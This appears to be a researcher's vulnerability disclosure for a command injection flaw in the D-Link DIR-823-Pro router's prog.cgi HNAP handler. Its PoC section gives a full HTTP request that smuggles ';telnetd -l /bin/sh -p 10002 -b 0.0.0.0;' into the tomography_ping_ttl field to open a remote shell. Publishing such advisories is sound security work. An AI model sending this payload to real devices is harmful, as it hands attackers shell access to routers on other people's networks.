# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `SetNetworkTomographySettings` function, `tomography_ping_address、tomography_ping_number、tomography_ping_size、tomography_ping_timeout、tomography_ping_ttl` is directly passed by the attacker, so we can control the `tomography_ping_address、tomography_ping_number、tomography_ping_size、tomography_ping_timeout、tomography_ping_ttl` to attack the OS.

As you can see here, the initial input will be extracted and cause command injection.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.What’s more interesting is that in the front-end interface, the user’s input is not checked either.



## PoC

We set `tomography_ping_ttl` as **;telnetd -l /bin/sh -p 10002 -b 0.0.0.0;** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetNetworkTomographySettings"
HNAP_AUTH: 1B8932C97C88EC83D81735BC7301BA48 1642576963746
Content-Length: 228
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/Diagnosis.html
Cookie: work_mode=router; uid=OVD8BKd1; PrivateKey=2156940C162B617049CBAE0A38C0EB42; timeout=8

{"SetNetworkTomographySettings":{"tomography_ping_address":"www.baidu.com","tomography_ping_number":"5","tomography_ping_size":"64","tomography_ping_timeout":"1","tomography_ping_ttl":";telnetd -l /bin/sh -p 10002 -b 0.0.0.0;"}}
```

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>
